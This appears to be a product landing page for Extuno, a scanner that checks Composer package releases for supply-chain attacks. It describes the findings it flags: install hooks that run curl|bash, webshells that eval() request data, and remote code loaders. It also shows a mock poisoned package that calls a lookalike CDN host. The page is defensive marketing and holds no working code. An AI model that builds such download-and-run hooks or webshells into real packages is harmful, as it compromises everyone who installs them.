Package registryComposer
Composer packages, checked on every release.
A poisoned Composer release can run code from a composer.json install hook, before any class is required. Extuno diffs each version and reads the PHP for install-script RCE, backdoors, and webshells - with static and AI analysis on every scan.
Composer - live inspectionInspecting
monolog/monolog 3.10
composer package
3.9->3.10composer package
Static
Dynamic
AI
Analyzing update
What Extuno catches in Composer
Evidence, not guesswork.
Each finding names the change, why it is dangerous, and the recommended action.
Diff finding
Install-script RCE
A composer.json post-install hook runs curl|bash on `composer install`.
Critical
Diff finding
Injected webshell
A file gains eval() over request data - a remote-controlled shell.
Critical
Diff finding
Remote code loader
The package fetches a URL and eval()s the response.
Review
See it on a poisoned update
Install-time PHP, caught before composer runs it
Extuno reads the composer.json hooks and the PHP, and flags the download-and-run install command.
- + Vulnerability and secret-leak testing on every version
- + Static analysis reads the package without running it
- + Dynamic sandbox runs it live and records behavior
- + AI code analysis reads the full source and correlates the change against prior versions
your-app
monolog/monolog 3.10
guzzlehttp/guzzle 7.9
symfony/console 7.1
acme/logger-helper 1.2.1post-install-cmd
acme/logger-helperpackagist-cdn.co
Scan your first Composer package free.
Your first 5 credits are free - that is 5 full scans, no card required.